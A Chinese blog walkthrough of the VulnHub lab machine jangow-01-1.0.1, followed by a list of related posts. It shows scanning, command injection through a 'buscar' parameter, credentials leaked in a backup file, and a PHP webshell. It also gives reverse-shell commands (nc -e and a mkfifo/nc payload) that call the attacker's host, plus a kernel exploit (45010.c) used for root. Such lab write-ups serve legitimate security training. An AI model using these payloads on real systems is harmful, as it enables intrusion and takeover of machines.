jangow-01-1.0.1靶机复现

最新推荐文章于 2024-08-08 10:00:00 发布
最新推荐文章于 2024-08-08 10:00:00 发布
阅读量292 收藏 6
点赞数 4
文章标签: web安全 网络安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62162207/article/details/140800748
版权

打开靶机,按下shift,出现下图界面。

在此页面按下e键,进入如下界面

将ro 替换为 rw signie init=/bin/bash

替换完毕后,按下Ctrl键+X键,进入如下页面。

ip a查看网卡信息

英文键盘那边的斜杠按不出来,需要按数字键盘的斜杠,修改配置文件网卡信息

修改成功后shift+?退出

kali主机探测arp-scan -l

发现该靶机的IP地址为 192.168.102.129 00:0c:29:6c:57:bd

打开一个这样的页面

发现没有什么有用信息进行目录扫描

发现有一个/.backup文件

发现有一个数据库的账号,密码,但是不知道有什么用,返回/site/页面,把能点的地方点一遍,发现buscar是可以传参的

namp进行端口扫描,发现该IP开启了21和80端口

访问看看,发现21端口并不能打开,所以只找到传参一个功能点

输入数据看看能不能执行,发现成功解析

发现开启的ftp端口,尝试访问

发现有一个输入密码的地方,想到/.backup文件爆出的账号密码,尝试连接,连接成功,可以进行ftp登录和系统登录

在参数上传处写入echo 'ls' >1.txt

发现有结果输出,尝试上传一句话木马

蚁剑进行连接

连接成功

/var/www/html/site/wordpress/config.php,在该目录下发现了一个账号密码

使用上面的账密进行登录发现登录失败,账密错误

kali监听其4444端口

打开蚁剑虚拟终端

输入nc -e /bin/sh 192.168.102.128 4444 这条命令

发现反弹shell失败

使用蚁剑在/var/www/html/site/下面新建shell.php文件

写入<?php system("rm /tem/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.102.128 443 > /tmp/f");?>这个命令

kali监听自己的443端口:nc -lvvp 443

浏览器访问http://192.168.102.129/site/shell.php,查看发布弹回来的shell,成功


输入python3 -c 'import pty;pty.spawn("/bin/bash")'

当前为www-data权限,所以需要提权,先查看内核版本和发行版本

通过上一步可知内核版本为4.4.0-31,发行版本为Ubuntu16.04

选用内核版本的第一个45010.c,将45010.c下载到本地

searchsploit -m 45010.c

本地编译exp gcc 45010.c -o exp

利用蚁剑直接上传exp

chmod +x a.out  //chmod 改变权限 +- r w x
./a.out

提权成功

下届免单用户
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jangow-01靶机全过程(超详细!)
qq_68868384的博客
08-09 282
使用nmap进行全网段大致扫描-sS:半开放扫描,扫描时不完成tcp的连接,这样可以使扫描更加隐蔽且更快-T4:paranoid (0), sneaky (1), polite (2), normal (3),侵略性(4)和疯狂(5)。前两个是为了逃避IDS(入侵检测系统)。礼貌模式减慢扫描速度以使用更少的带宽目标机器资源。正常模式是默认的,所以-T3什么也不做。侵略性模式将扫描速度提高到假设您在一个相当快速和可靠的网络上。
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2695
迟到的文章,就当库存发出来吧~
Jangow-1.0.1靶机漏洞复现(未完成)
C233333235的博客
07-31 332
然后我们尝试反弹shell,这里需要使用mkfifo 命令创建命名管道反弹shell,首先利用蚁剑在/var/www/html/site下创建一个名为1.php的文件,内容如下,其中端口为443,ip为kali的ip。我们在系统中翻找一下,发现了worldpress与html/.backup中都有账号和密码,虽然不知道在哪里登录,但是先记下来。开启靶机后访问ip进入如下页面,点击site进入到一个网站,我们用kali中的dirsearsh扫面一下目录。那么我们直接上传一个一句话木马,利用如下语句。
jangow-01-1.0.1靶机复盘
weixin_44681307的博客
07-09 166
为什么要说防火墙,后来才发现这个靶机设置了防火墙,只有允许的端口允许的命令才可以用,其他的都不能用,包括端口也只有443端口被允许通过。因为nc -e不能用,所以就在网上找了个反弹shell的命令,这里要注意的是只有443端口能用,别的端口都不能用。在网址后面随便输入ls命令,发现可以用,经过尝试发现这里可以注入代码,但是有一些命令被禁用了,比如nc。搜了一圈发现有两个php文件挺可疑,就发送到自己电脑上了,实际后面没啥用,ftp也没啥用。测试后发现是可以的,代码不见了,说明被执行了。
超详细jangow-01-1.0.1靶机复现过程
weixin_67729650的博客
08-05 1162
靶机导入到最后的提权这一过程,重在思路的建立.
jangow靶机实验实战演练
lianliandad的博客
11-02 867
Ubuntu 16.04版本存在本地提权漏洞,该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题,攻击者通过普通用户权限可以利用该漏洞进行提升至高权限用户,获取root权限。
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 1134
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
jangow-01-1.0.1
01-19
vulnhub的靶机jangow-01-1.0.1 Description Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-...
我的世界光影SEUS-Renewed-v1.0.1.zip
05-16
"SEUS-Renewed-v1.0.1.zip" 是一款专为《我的世界》设计的光影包,它基于经典的SEUS光影进行改进和优化,旨在提供更加美观、真实的视觉享受。 SEUS光影最初由Creeperman86开发,因其独特的视觉风格和高质量的光影...
rocketmq-console-ng-1.0.1.jar
07-22
java -jar rocketmq-console-ng-1.0.1.jar 启动 ---当终端断了该服务就会停止 nohup java -jar rocketmq-console-ng-1.0.1.jar >>/soft/RocketMQ/rocketmqlogs/log.out 2>&1 & 后台启动 --当终端断了也不会停止服务
Vulnhub靶机jangow-01-1.0.1
qq_48904485的博客
01-03 546
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机jangow01(10.0.2.4)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/
VulnHub之JANGOW-01-1.0.1渗透
m0_73481504的博客
03-06 405
1.了解命令执行漏洞2.一句话木马,反弹shell3.中国蚁剑的使用4.Ubuntu 4.4.0-31漏洞利用。
jangow-01-1.0.1 靶机渗透
braty_的博客
04-06 359
看了一些大佬的wp,发现该靶机只能用443端口,防火墙做了限制。
jangow-01-1.0.1靶机渗透测试
weixin_58786230的博客
07-12 202
【代码】jangow-01-1.0.1靶机渗透测试。
vulnhub靶机jangow-01-1.0.1
最新发布
weixin_68416970的博客
08-08 591
保存下面代码为一个 php 文件,重命名为 test.php,上传到靶机的 /var/www/html/site/ 目录下。因为靶机的原因无法使用监听端口的方法传输文件,直接把 45010.c 从 kali 拖到本机桌面,再用蚁剑上传。修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)因为我 kali 的小 bug,这里输入的命令会显示双写,但是不影响命令执行。在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。
vulnhub——jangow-01-1.0.1靶机渗透 超详细
qq_48368964的博客
07-31 404
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。init用于指定内核挂载根文件系统后运行的第一个用户空间程序的绝对路径(也有文章描述为设置内核执行的初始化进程名)。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)重启进入系统,使用刚才修改的root密码进入root权限。
vulnhub靶机-JANGOW: 1.0.1
臭nana的博客
03-08 4332
Description Back to the Top Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0 1、开机(virtualbox)直接得到靶机ip:192.16.
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值